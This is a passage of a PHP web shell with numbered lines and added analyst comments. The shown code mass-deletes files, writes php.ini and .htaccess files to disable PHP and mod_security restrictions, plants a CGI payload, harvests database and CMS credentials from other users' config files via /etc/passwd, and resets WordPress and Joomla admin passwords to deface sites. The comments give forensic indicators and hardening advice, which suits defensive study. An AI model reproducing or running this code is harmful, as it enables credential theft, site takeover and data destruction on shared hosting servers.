  939. fwrite($dz, $suck."\n");
  940. }
  941. }
  942. echo "Shell [ <a href='./result.txt' target='_blank'>result.txt</a> ]</span>";
  943. }
  944. }elseif($_GET['do'] == 'mass_delete') {
  /**
   * Deletes files named $namafile from $dir, its parent and its subdirectories.
   *
   * For each entry returned by scandir($dir): "." removes "$dir/$namafile" and
   * ".." removes the file of that name in dirname($dir), each only when the
   * file exists and without printing anything. Any other entry that is a
   * writable directory containing the file has it removed, is reported with a
   * "[DELETED]" line, and is then passed to a recursive call. A subdirectory
   * that does not itself contain the file is not descended into. Nothing is
   * done when $dir is not writable.
   *
   * Analyst note: the effect is the disappearance of one file name (the form
   * below defaults it to index.php) across a directory tree and one level
   * above it. Restoring from backup and comparing against a known-good file
   * manifest shows the extent.
   *
   * @param string $dir       Starting directory; the caller in this branch passes $_POST['d_dir'] unchanged.
   * @param string $namafile  File name to delete wherever it is found.
   * @return void             The recursive call's result is stored in $idx and never read.
   */
  945. function hapus_massal($dir,$namafile) {
  946. if(is_writable($dir)) {
  947. $dira = scandir($dir);
  948. foreach($dira as $dirb) {
  949. $dirc = "$dir/$dirb";
  950. $lokasi = $dirc.'/'.$namafile;
  951. if($dirb === '.') {
  952. if(file_exists("$dir/$namafile")) {
  953. unlink("$dir/$namafile");
  954. }
  955. } elseif($dirb === '..') {
  956. if(file_exists("".dirname($dir)."/$namafile")) {
  957. unlink("".dirname($dir)."/$namafile");
  958. }
  959. } else {
  960. if(is_dir($dirc)) {
  961. if(is_writable($dirc)) {
  962. if(file_exists($lokasi)) {
  963. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  964. unlink($lokasi);
  965. $idx = hapus_massal($dirc,$namafile);
  966. }
  967. }
  968. }
  969. }
  970. }
  971. }
  972. }
  // Request handler for this branch: on submission the directory and file
  // name are taken from $_POST and passed to hapus_massal() without
  // validation; otherwise the form is rendered with the current $dir and
  // "index.php" pre-filled.
  973. if($_POST['start']) {
  974. echo "<div style='margin: 5px auto; padding: 5px'>";
  975. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  976. echo "</div>";
  977. } else {
  978. echo "<center>";
  979. echo "<form method='post'>
  980. <font style='text-decoration: underline;'>Folder:</font><br>
  981. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  982. <font style='text-decoration: underline;'>Filename:</font><br>
  983. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  984. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  985. </form></center>";
  986. }
  987. }elseif($_GET['do'] == 'bypass'){
  // This branch offers two buttons, each of which writes a configuration file
  // into the current working directory:
  //   'ini'  -> php.ini containing "disable_functions=none" and "safe_mode = Off"
  //   'htce' -> .htaccess containing SecFilterEngine / SecFilterScanPOST "Off"
  //             inside an <IfModule mod_security.c> block
  // Both files are opened with mode "w", so an existing file of the same name
  // in that directory is truncated and replaced. The value echoed after each
  // write is fwrite()'s return value.
  //
  // Analyst note: whether either file has any effect depends on server
  // configuration that is not visible here. As indicators, look for a php.ini
  // appearing inside a content directory and for a .htaccess whose previous
  // rules have been replaced by the block below. Restricting AllowOverride
  // and not honouring per-directory php.ini files removes the mechanism.
  988. echo "<center>";
  989. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  990. if(isset($_POST['ini']))
  991. {
  992. $file = fopen("php.ini","w");
  993. echo fwrite($file,"disable_functions=none
  994. safe_mode = Off
  995. ");
  996. fclose($file);
  997. echo "<a href='php.ini'>click here!</a>";
  998. } if(isset($_POST['htce']))
  999. {
  1000. $file = fopen(".htaccess","w");
  1001. echo fwrite($file,"<IfModule mod_security.c>
  1002. SecFilterEngine Off
  1003. SecFilterScanPOST Off
  1004. </IfModule>
  1005. ");
  1006. fclose($file);
  1007. echo "htaccess successfully created!";
  1008. }
  1009. echo"</center>";
  1010. } elseif($_GET['do'] == 'convh')
  1011. {
  // This branch creates a priv_vhost directory under the current working
  // directory, writes a .htaccess that enables ExecCGI and maps the .ler
  // extension to the cgi-script handler, then writes a base64-decoded payload
  // to pe.ler with mode 0755 and links to it.
  // The payload string has been removed from this copy of the paste, so the
  // content of pe.ler cannot be determined here.
  //
  // Analyst note: an unusual extension mapped to cgi-script in a freshly
  // created .htaccess, next to an executable file with that extension, is the
  // artefact to search for. Restricting AllowOverride so that .htaccess cannot
  // set Options or AddHandler prevents the mapping from taking effect.
  1012. @mkdir('priv_vhost', 0755);
  1013. @chdir('priv_vhost');
  1014. $elesem = ".htaccess";
  1015. $elakab = "$elesem";
  1016. $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
  1017. $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
  1018.  
  1019. AddType application/x-httpd-cgi .ler
  1020.  
  1021. AddHandler cgi-script .ler
  1022. AddHandler cgi-script .ler";
  1023. fwrite ( $filhat , $htcont ) ;
  1024. fclose ($filhat);
  1025. $config = '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';
  1026. $file = fopen("pe.ler" ,"w+");
  1027. $write = fwrite ($file ,base64_decode($config));
  1028. fclose($file);
  1029. chmod("pe.ler",0755);
  1030. echo "<center><a href='priv_vhost/pe.ler'>Click Here !</a></center>";
  1031. } elseif($_GET['do'] == 'config') {
  1032. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1033. $idx = mkdir("priv_config", 0777);
  1034. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1035. $htc = fopen("priv_config/.htaccess","w");
  1036. fwrite($htc, $isi_htc);
  1037. while($passwd = fgets($etc)) {
  1038. if($passwd == "" || !$etc) {
  1039. echo "<font color=red>Can't read /etc/passwd</font>";
  1040. } else {
  1041. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1042. foreach($user_config[1] as $user_idx) {
  1043. $user_config_dir = "/home/$user_idx/public_html/";
  1044. if(is_readable($user_config_dir)) {
  1045. $grab_config = array(
  1046. "/home/$user_idx/.my.cnf" => "cpanel",
  1047. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  1048. "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
  1049. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  1050. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  1051. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  1052. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1053. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  1054. "/home/$user_idx/public_html/submitticket.php" => "WHMCS",
  1055. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  1056. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  1057. "/home/$user_idx/public_html/WHMCS/configuration.php" => "WHMCS",
  1058. "/home/$user_idx/public_html/whmcs1/configuration.php" => "WHMCS",
  1059. "/home/$user_idx/public_html/Whmcs/configuration.php" => "WHMCS",
  1060. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  1061. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  1062. "/home/$user_idx/public_html/WHMC/configuration.php" => "WHMCS",
  1063. "/home/$user_idx/public_html/Whmc/configuration.php" => "WHMCS",
  1064. "/home/$user_idx/public_html/whmc/configuration.php" => "WHMCS",
  1065. "/home/$user_idx/public_html/WHM/configuration.php" => "WHMCS",
  1066. "/home/$user_idx/public_html/Whm/configuration.php" => "WHMCS",
  1067. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  1068. "/home/$user_idx/public_html/HOST/configuration.php" => "WHMCS",
  1069. "/home/$user_idx/public_html/Host/configuration.php" => "WHMCS",
  1070. "/home/$user_idx/public_html/host/configuration.php" => "WHMCS",
  1071. "/home/$user_idx/public_html/SUPPORTES/configuration.php" => "WHMCS",
  1072. "/home/$user_idx/public_html/Supportes/configuration.php" => "WHMCS",
  1073. "/home/$user_idx/public_html/supportes/configuration.php" => "WHMCS",
  1074. "/home/$user_idx/public_html/domains/configuration.php" => "WHMCS",
  1075. "/home/$user_idx/public_html/domain/configuration.php" => "WHMCS",
  1076. "/home/$user_idx/public_html/Hosting/configuration.php" => "WHMCS",
  1077. "/home/$user_idx/public_html/HOSTING/configuration.php" => "WHMCS",
  1078. "/home/$user_idx/public_html/hosting/configuration.php" => "WHMCS",
  1079. "/home/$user_idx/public_html/CART/configuration.php" => "WHMCS",
  1080. "/home/$user_idx/public_html/Cart/configuration.php" => "WHMCS",
  1081. "/home/$user_idx/public_html/cart/configuration.php" => "WHMCS",
  1082. "/home/$user_idx/public_html/ORDER/configuration.php" => "WHMCS",
  1083. "/home/$user_idx/public_html/Order/configuration.php" => "WHMCS",
  1084. "/home/$user_idx/public_html/order/configuration.php" => "WHMCS",
  1085. "/home/$user_idx/public_html/CLIENT/configuration.php" => "WHMCS",
  1086. "/home/$user_idx/public_html/Client/configuration.php" => "WHMCS",
  1087. "/home/$user_idx/public_html/client/configuration.php" => "WHMCS",
  1088. "/home/$user_idx/public_html/CLIENTAREA/configuration.php" => "WHMCS",
  1089. "/home/$user_idx/public_html/Clientarea/configuration.php" => "WHMCS",
  1090. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  1091. "/home/$user_idx/public_html/SUPPORT/configuration.php" => "WHMCS",
  1092. "/home/$user_idx/public_html/Support/configuration.php" => "WHMCS",
  1093. "/home/$user_idx/public_html/support/configuration.php" => "WHMCS",
  1094. "/home/$user_idx/public_html/BILLING/configuration.php" => "WHMCS",
  1095. "/home/$user_idx/public_html/Billing/configuration.php" => "WHMCS",
  1096. "/home/$user_idx/public_html/billing/configuration.php" => "WHMCS",
  1097. "/home/$user_idx/public_html/BUY/configuration.php" => "WHMCS.txt",
  1098. "/home/$user_idx/public_html/Buy/configuration.php" => "WHMCS.txt",
  1099. "/home/$user_idx/public_html/buy/configuration.php" => "WHMCS.txt",
  1100. "/home/$user_idx/public_html/MANAGE/configuration.php" => "WHMCS.txt",
  1101. "/home/$user_idx/public_html/Manage/configuration.php" => "WHMCS.txt",
  1102. "/home/$user_idx/public_html/manage/configuration.php" => "WHMCS.txt",
  1103. "/home/$user_idx/public_html/CLIENTSUPPORT/configuration.php" => "WHMCS",
  1104. "/home/$user_idx/public_html/ClientSupport/configuration.php" => "WHMCS",
  1105. "/home/$user_idx/public_html/Clientsupport/configuration.php" => "WHMCS",
  1106. "/home/$user_idx/public_html/clientsupport/configuration.php" => "WHMCS",
  1107. "/home/$user_idx/public_html/CHECKOUT/configuration.php" => "WHMCS",
  1108. "/home/$user_idx/public_html/Checkout/configuration.php" => "WHMCS",
  1109. "/home/$user_idx/public_html/checkout/configuration.php" => "WHMCS",
  1110. "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS",
  1111. "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS",
  1112. "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS",
  1113. "/home/$user_idx/public_html/BASKET/configuration.php" => "WHMCS",
  1114. "/home/$user_idx/public_html/Basket/configuration.php" => "WHMCS",
  1115. "/home/$user_idx/public_html/basket/configuration.php" => "WHMCS",
  1116. "/home/$user_idx/public_html/SECURE/configuration.php" => "WHMCS",
  1117. "/home/$user_idx/public_html/Secure/configuration.php" => "WHMCS",
  1118. "/home/$user_idx/public_html/secure/configuration.php" => "WHMCS",
  1119. "/home/$user_idx/public_html/SALES/configuration.php" => "WHMCS",
  1120. "/home/$user_idx/public_html/Sales/configuration.php" => "WHMCS",
  1121. "/home/$user_idx/public_html/sales/configuration.php" => "WHMCS",
  1122. "/home/$user_idx/public_html/BILL/configuration.php" => "WHMCS",
  1123. "/home/$user_idx/public_html/Bill/configuration.php" => "WHMCS",
  1124. "/home/$user_idx/public_html/bill/configuration.php" => "WHMCS",
  1125. "/home/$user_idx/public_html/PURCHASE/configuration.php" => "WHMCS",
  1126. "/home/$user_idx/public_html/Purchase/configuration.php" => "WHMCS",
  1127. "/home/$user_idx/public_html/purchase/configuration.php" => "WHMCS",
  1128. "/home/$user_idx/public_html/ACCOUNT/configuration.php" => "WHMCS",
  1129. "/home/$user_idx/public_html/Account/configuration.php" => "WHMCS",
  1130. "/home/$user_idx/public_html/account/configuration.php" => "WHMCS",
  1131. "/home/$user_idx/public_html/USER/configuration.php" => "WHMCS",
  1132. "/home/$user_idx/public_html/User/configuration.php" => "WHMCS",
  1133. "/home/$user_idx/public_html/user/configuration.php" => "WHMCS",
  1134. "/home/$user_idx/public_html/CLIENTS/configuration.php" => "WHMCS",
  1135. "/home/$user_idx/public_html/Clients/configuration.php" => "WHMCS",
  1136. "/home/$user_idx/public_html/clients/configuration.php" => "WHMCS",
  1137. "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS",
  1138. "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS",
  1139. "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS",
  1140. "/home/$user_idx/public_html/MY/configuration.php" => "WHMCS",
  1141. "/home/$user_idx/public_html/My/configuration.php" => "WHMCS",
  1142. "/home/$user_idx/public_html/my/configuration.php" => "WHMCS",
  1143. "/home/$user_idx/public_html/secure/whm/configuration.php" => "WHMCS",
  1144. "/home/$user_idx/public_html/secure/whmcs/configuration.php" => "WHMCS",
  1145. "/home/$user_idx/public_html/panel/configuration.php" => "WHMCS",
  1146. "/home/$user_idx/public_html/clientes/configuration.php" => "WHMCS",
  1147. "/home/$user_idx/public_html/cliente/configuration.php" => "WHMCS",
  1148. "/home/$user_idx/public_html/support/order/configuration.php" => "WHMCS",
  1149. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  1150. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  1151. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  1152. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  1153. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  1154. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  1155. "/home/$user_idx/public_html/administrator/config.php" => "Joomla",
  1156. "/home/$user_idx/public_html/blog/configuration.php" => "Joomla",
  1157. "/home/$user_idx/public_html/cms/configuration.php" => "Joomla.txt",
  1158. "/home/$user_idx/public_html/beta/configuration.php" => "Joomla",
  1159. "/home/$user_idx/public_html/portal/configuration.php" => "Joomla",
  1160. "/home/$user_idx/public_html/site/configuration.php" => "Joomla",
  1161. "/home/$user_idx/public_html/main/configuration.php" => "Joomla",
  1162. "/home/$user_idx/public_html/home/configuration.php" => "Joomla",
  1163. "/home/$user_idx/public_html/demo/configuration.php" => "Joomla",
  1164. "/home/$user_idx/public_html/test/configuration.php" => "Joomla",
  1165. "/home/$user_idx/public_html/v1/configuration.php" => "Joomla",
  1166. "/home/$user_idx/public_html/v2/configuration.php" => "Joomla",
  1167. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  1168. "/home/$user_idx/public_html/new/configuration.php'" => "Joomla",
  1169. "/home/$user_idx/public_html/wp/test/wp-config.php" => "Wordpress",
  1170. "/home/$user_idx/public_html/blog/wp-config.php" => "Wordpress",
  1171. "/home/$user_idx/public_html/beta/wp-config.php" => "Wordpress",
  1172. "/home/$user_idx/public_html/portal/wp-config.php" => "Wordpress",
  1173. "/home/$user_idx/public_html/site/wp-config.php" => "Wordpress",
  1174. "/home/$user_idx/public_html/WP/wp-config.php" => "Wordpress",
  1175. "/home/$user_idx/public_html/news/wp-config.php" => "Wordpress",
  1176. "/home/$user_idx/public_html/test/wp-config.php" => "Wordpress",
  1177. "/home/$user_idx/public_html/demo/wp-config.php" => "Wordpress",
  1178. "/home/$user_idx/public_html/home/wp-config.php" => "Wordpress",
  1179. "/home/$user_idx/public_html/v1/wp-config.php" => "Wordpress",
  1180. "/home/$user_idx/public_html/v2/wp-config.php" => "Wordpress",
  1181. "/home/$user_idx/public_html/press/wp-config.php" => "Wordpress",
  1182. "/home/$user_idx/public_html/new/wp-config.php" => "Wordpress",
  1183. "/home/$user_idx/public_html/blogs/wp-config.php" => "Wordpress",
  1184. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  1185. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  1186. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  1187. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  1188. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  1189. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab",
  1190. "/home/$user_idx/public_html/db/db.php" => "Unknown",
  1191. "/home/$user_idx/public_html/setdatabaseb.php" => "Unknown",
  1192. "/home/$user_idx/public_html/db/setdatabaseb.php" => "Unknown",
  1193. "/home/$user_idx/public_html/database/db.php" => "Unknown",
  1194. "/home/$user_idx/public_html/koneksi/db.php" => "Unknown",
  1195. "/home/$user_idx/public_html/koneksi/database.php" => "Unknown",
  1196. "/home/$user_idx/public_html/koneksi/koneksi.php" => "Unknown",
  1197. "/home/$user_idx/public_html/db/config.php" => "Unknown",
  1198. "/home/$user_idx/public_html/db/database.php" => "Unknown",
  1199. "/home/$user_idx/public_html/database/config.php" => "Unknown",
  1200. "/home/$user_idx/public_html/konfigurasi/conf.php" => "Unknown",
  1201. "/home/$user_idx/public_html/konfigurasi/database.php" => "Unknown",
  1202. "/home/$user_idx/public_html/conf/db.php" => "Unknown",
  1203. "/home/$user_idx/public_html/conf/php.php" => "Unknown",
  1204. "/home/$user_idx/public_html/conf/config.php" => "Unknown",
  1205. "/home/$user_idx/public_html/conf/conf.php" => "Unknown",
  1206. "/home/$user_idx/public_html/admin/koneksi.php" => "Unknown",
  1207. "/home/$user_idx/public_html/cf/db.php" => "Unknown",
  1208. "/home/$user_idx/public_html/config/index.php" => "Unknown",
  1209. "/home/$user_idx/public_html/config/data.php" => "Unknown",
  1210. "/home/$user_idx/public_html/admin/db.php" => "Unknown",
  1211. "/home/$user_idx/public_html/admin/config.php" => "Unknown",
  1212. "/home/$user_idx/public_html/admin/configuration.php" => "Unknown",
  1213. "/home/$user_idx/public_html/admin/conf.php" => "Unknown",
  1214. "/home/$user_idx/public_html/configuracion/connection.php" => "Unknown",
  1215. "/home/$user_idx/public_html/connection" => "Unknown",
  1216. "/home/$user_idx/public_html/konfigurasi/config.php" => "Unknown",
  1217. "/home/$user_idx/public_html/admin/inc/config.php" => "Unknown",
  1218. "/home/$user_idx/public_html/inc/config.php" => "Unknown",
  1219. "/home/$user_idx/public_html/admin/inc/db.php" => "Unknown",
  1220. "/home/$user_idx/public_html/inc/db.php" => "Unknown",
  1221. "/home/$user_idx/public_html/admin/inc/configuration.php" => "Unknown",
  1222. "/home/$user_idx/public_html/inc/configuration.php" => "Unknown",
  1223. "/home/$user_idx/public_html/include/configuration.php" => "Unknown",
  1224. "/home/$user_idx/public_html/include/config.php" => "Unknown",
  1225. "/home/$user_idx/public_html/include/db.php" => "Unknown",
  1226. "/home/$user_idx/public_html/inc/database.php" => "Unknown",
  1227. "/home/$user_idx/public_html/include/database.php" => "Unknown",
  1228. "/home/$user_idx/public_html/include/configuration.php" => "Unknown",
  1229. "/home/$user_idx/public_html/includes/configuration.php" => "Unknown",
  1230. "/home/$user_idx/public_html/includes/config.php" => "Unknown",
  1231. "/home/$user_idx/public_html/includes/db.php" => "Unknown",
  1232. "/home/$user_idx/public_html/includes/database.php" => "Unknown",
  1233. "/home/$user_idx/public_html/vb/includes/config.php" => "Vbulletin",
  1234. "/home/$user_idx/public_html/includes/config.php" => "Vbulletin",
  1235. "/home/$user_idx/public_html/forum/includes/config.php" => "Vbulletin",
  1236. "/home/$user_idx/public_html/forums/includes/config.php" => "Vbulletin",
  1237. "/home/$user_idx/public_html/cc/includes/config.php" => "Vbulletin",
  1238. "/home/$user_idx/public_html/inc/config.php" => "MyBB",
  1239. "/home/$user_idx/public_html/includes/configure.php" => "OsCommerce",
  1240. "/home/$user_idx/public_html/shop/includes/configure.php" => "OsCommerce",
  1241. "/home/$user_idx/public_html/os/includes/configure.php" => "OsCommerce",
  1242. "/home/$user_idx/public_html/oscom/includes/configure.php" => "OsCommerce",
  1243. "/home/$user_idx/public_html/products/includes/configure.php" => "OsCommerce",
  1244. "/home/$user_idx/public_html/cart/includes/configure.php" => "OsCommerce",
  1245. "/home/$user_idx/public_html/inc/conf_global.php" => "IPB");
  // Analyst note: config-harvesting loop of this web shell.
  // $grab_config maps candidate CMS/database config paths under another account's
  // public_html to a label; $user_idx is set outside this view (presumably one
  // local account name per pass — confirm against the enclosing loop).
  // Each path is read with file_get_contents(); any non-empty result is written to
  // priv_config/<user>-<label>.txt. ($ambil_config = the fetched content,
  // $nama_config = the label.)
  // Forensic caveats visible in the code:
  //  - the file is opened with mode "w" and named only from user + label, so a later
  //    hit with the same label replaces an earlier one; the files found on disk can
  //    understate how many configs were actually read;
  //  - the handle is never closed and read failures are not reported.
  // Response: treat a priv_config/ directory holding <user>-<label>.txt files as an
  // indicator of compromise, and rotate every database credential found in them.
  // A read only succeeds when the web server user can open other accounts' files,
  // so per-account isolation and config files that are not world-readable are the
  // controls that stop it.
  1246. foreach($grab_config as $config => $nama_config) {
  1247. $ambil_config = file_get_contents($config);
  // Loose comparison: a failed read (false) and an empty file are both skipped here.
  1248. if($ambil_config == '') {
  1249. } else {
  1250. $file_config = fopen("priv_config/$user_idx-$nama_config.txt","w");
  1251. fputs($file_config,$ambil_config);
  1252. }
  1253. }
  1254. }
  1255. }
  1256. }
  1257. }
  1258. echo "<center><a href='?bom&folder=$dir/priv_config'><font color=lime>Done</font></a></center>";
  1259. } elseif($_GET['do'] == 'boom') {
  // Analyst note: body of the do=boom branch, which the page itself titles
  // "Wordpress and Joomla Mass Defacer". The code is minified and hard-wrapped by the
  // paste site (some breaks fall inside string literals), so it is annotated here only.
  //
  // What the visible code does:
  //  - entre2v2(): returns the trimmed text between two marker strings; used to pull DB
  //    settings out of config text and hidden form fields out of admin pages.
  //  - randomt(): builds an 8-character name from rand(); used as a cURL cookie-jar file.
  //  - index_changer_wp(): takes DB_USER/DB_PASSWORD/DB_NAME/DB_HOST/table_prefix from a
  //    wp-config text, overwrites the login and password hash of user ID 1, logs in over
  //    HTTP and posts new content for the active theme's index.php via theme-editor.php.
  //  - index_changer_joomla(): same idea for Joomla; its UPDATE has no WHERE clause, so
  //    every row of the users table gets the same name, password hash, "Super
  //    Administrator" type and block = 0.
  //  - exec_mode_1/2/3(): list domains from /etc/named.conf, map each to its owner through
  //    /etc/valiases, obtain that owner's config via a symlink directory served over HTTP,
  //    and call the two functions above. Results are appended to defaced.html.
  //  - The page output ends with a 1px iframe to an external host; its purpose is not
  //    visible here.
  //
  // Indicators for triage (all taken from literals in this block):
  //  - directories sym/ and plsym/ beside the script, each with an .htaccess; sym/root is a
  //    symlink to /; plsym/ may hold data.txt and entries named <x>##joomla.txt or
  //    <x>##wordpress.txt;
  //  - files defaced.html, COOKIE.txt and 8-character cookie-jar files in the script's
  //    directory (cleanup relies on $base_path, which is not defined in this view, so they
  //    may be left behind);
  //  - CMS user tables where the admin login is "admin" with the fixed hash value below;
  //  - wp-login.php, theme-editor.php or /administrator requests that originate from the
  //    server itself and carry the "MSIE 7.0b ... Alexa Toolbar" user agent.
  //
  // Hardening that removes the preconditions: keep config files unreadable to other
  // accounts, use SymLinksIfOwnerMatch rather than FollowSymLinks, limit what tenant
  // .htaccess files may override (Options, handlers), and disable in-dashboard theme
  // editing (WordPress: DISALLOW_FILE_EDIT). After an incident, rotate DB credentials and
  // reset every CMS account, not only the first one.
  // NOTE(review): the mysql_* calls belong to an extension removed in PHP 7, so on such
  // hosts the database step would fail unless a shim exists elsewhere — confirm before
  // ruling out tampering.
  1260. {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 
0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface 
'.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br 